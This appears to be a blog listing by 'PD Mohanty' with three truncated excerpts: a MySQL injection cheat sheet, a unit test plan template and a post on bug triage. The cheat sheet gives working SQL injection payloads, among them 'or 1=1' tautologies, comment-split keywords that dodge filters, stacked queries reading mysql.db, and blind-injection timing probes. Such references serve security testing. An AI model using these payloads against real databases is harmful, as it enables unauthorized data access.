PD MOHANTY

  MySQL Injection Cheat Sheet Basics. SELECT * FROM login /* foobar */ SELECT * FROM login WHERE id = 1 or 1=1 SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%" Variations. SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%" SHOW TABLES SELECT * FROM login WHERE id = 1 or 1=1; SHOW TABLES SELECT VERSION SELECT * FROM login WHERE id = 1 or 1=1; SELECT VERSION() SELECT host,user,db from mysql.db SELECT * FROM login WHERE id = 1 or 1=1; select host,user,db from mysql.db; Blind injection vectors. Operators SELECT 1 && 1; SELECT 1 || 1; SELECT 1 XOR 0; Evaluate all render TRUE or 1. SELECT 0.1 <= 2; SELECT 2 >= 2; SELECT ISNULL(1/0); Math SELECT FLOOR(7 + ( RAND () * 5)); SELECT ROUND(23.298, -1); Misc SELECT LENGTH(COMPRESS(REPEAT('a',1000))); SELECT MD5('abc'); Benchmark SELECT BENCHMARK(10000000,ENCODE('abc','123')); ...

Unit Test Plan Module ID: _________ Program ID: ___________   1.  Module Overview Briefly define the purpose of this module.  This may require only a single phrase: i.e.: calculates overtime pay amount, calculates equipment depreciation, performs date edit validation, or determines sick pay eligibility, etc. 1.1  Inputs to Module [Provide a brief description of the inputs to the module under test.] 1.2  Outputs from Module [Provide a brief description of the outputs from the module under test.] 1.3  Logic Flow Diagram [Provide logic flow diagram if additional clarity is required.] 2.  Test Data (Provide a listing of test cases to be exercised to verify processing logic.) 2.1  Positive Test Cases [Representative data samples should provide a spectrum of valid field and processing values including "Syntactic" permutations...

Bug Triage– Severity & Priority "Triage" is a medical term. It refers to dividing wounded or sick people into three categories: those who will die no matter what you do, those who will recover even if unaided, and those who will recover only if aided. In a situation where there's too much to do, you must concentrate on the third group. Bug Triage Meetings (sometimes called Bug Councils) are project meetings in which open bugs are divided into categories. The most important distinction is between bugs that will not be fixed in this release and those that will be There are three categories for the medical usage, software also three categories - bugs to fix now, bugs to fix later, and bugs we'll never fix Triaging a bug involves: Making sure the bug has enough information for the developers and makes sense Making sure the bug is filed in the correct place Making sure the bug has sensible "Severity" and "Priority" fields Let us see wh...